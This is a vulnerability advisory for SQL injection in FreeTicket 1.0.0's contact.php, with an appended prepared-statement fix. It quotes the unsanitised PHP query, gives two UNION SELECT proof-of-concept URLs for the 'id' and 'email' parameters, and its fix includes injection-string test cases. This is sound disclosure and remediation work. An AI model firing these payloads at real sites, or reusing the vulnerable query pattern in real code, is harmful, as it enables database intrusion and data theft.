SQL injections in FreeTicket
Summary
- Vulnerability: SQL injections in FreeTicket
- Discovered: 2010.11.14
- Last Update: n/a n/a
- ID: EV0146
- CVE: CVE-2010-4363
- Risk Level: medium
- Type: SQL injection
- Status: Unpatched. Vendor notified. No reply from developer(s)
- Vendor: Mrcgiguy (http://www.mrcgiguy.com/)
- Vulnerable Software: FreeTicket
- Version: 1.0.0
- PoC/Exploit: Available
- Solution: Not available
- Discovered by: Aliaksandr Hartsuyeu (eVuln.com)
Description
SQL injection vulnerabilities were found in the FreeTicket script.
- 'id' SQL injection
- The vulnerability is in the contact.php script. The user-supplied variable id is not properly sanitized before being used in an SQL query. This can be used to execute an arbitrary SQL query.
- 'email' SQL injection
- The vulnerable script is contact.php. The email parameter is not properly sanitized before being used in an SQL query.
PoC/Exploit
Vulnerable code.
No SQL injection filter is applied:
$email = $_POST["email"];
$id = $_POST["id"];
if (!$id) {$id = $_GET[id];}
if (!$email) {$email = $_GET[email];}
$result=mysql_query("SELECT * FROM messages WHERE uid = \"$id\" AND email = \"$email\"");
'id' SQL injection example.
The following PoC code is available:
http://website.com/contact.php?id=-1' union select 1,2,3,4,5,6,7,8,9,10/*
'email' SQL injection example.
PoC code:
http://website.com/contact.php?email=-1' union select 1,1,1,1,1,1,1,1,1,1/*
Condition.
magic_quotes_gpc = off
Solution.
A solution for "SQL injections in FreeTicket" is not available. Check the Mrcgiguy website for updates.
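Since no vendor fix exists, the following is an added example (not code from FreeTicket or from this advisory) of how the contact.php lookup could be written with PDO prepared statements. It assumes the pdo_sqlite and ctype extensions, that uid is a numeric key, and uses an in-memory SQLite table with constructed rows in place of the real MySQL database; the function name find_messages and the body column are hypothetical.

```php
<?php
// Added example, not FreeTicket code. SQLite in memory stands in for MySQL;
// the body column and all sample rows are constructed for the demonstration.

function find_messages(PDO $db, ?string $id, ?string $email): array
{
    // Assumption: uid is a numeric key, so anything but digits is rejected.
    if ($id === null || $email === null || !ctype_digit($id)) {
        return [];
    }
    // Placeholders send the values separately from the SQL text, so quote
    // characters in $email stay data and cannot change the statement.
    $stmt = $db->prepare(
        'SELECT * FROM messages WHERE uid = :uid AND email = :email'
    );
    $stmt->bindValue(':uid', (int) $id, PDO::PARAM_INT);
    $stmt->bindValue(':email', $email, PDO::PARAM_STR);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE messages (uid INTEGER, email TEXT, body TEXT)');
$db->exec("INSERT INTO messages VALUES (7, 'alice@example.com', 'ticket A')");
$db->exec("INSERT INTO messages VALUES (8, 'bob@example.com', 'ticket B')");

// In contact.php the same POST-then-GET lookup would be written as:
//   $id = $_POST['id'] ?? $_GET['id'] ?? null;
$cases = [
    ['7', 'alice@example.com'],            // legitimate lookup
    ['7" OR "1"="1', 'alice@example.com'], // rejected by the digit check
    ['7', 'x" OR "1"="1'],                 // bound as a literal, matches nothing
    [null, null],                          // missing parameters
];
foreach ($cases as [$id, $email]) {
    $rows = find_messages($db, $id, $email);
    printf("id=%s email=%s -> %d row(s)\n",
        var_export($id, true), var_export($email, true), count($rows));
}
```

Because the values never enter the SQL text, the outcome does not depend on the magic_quotes_gpc setting listed under Condition.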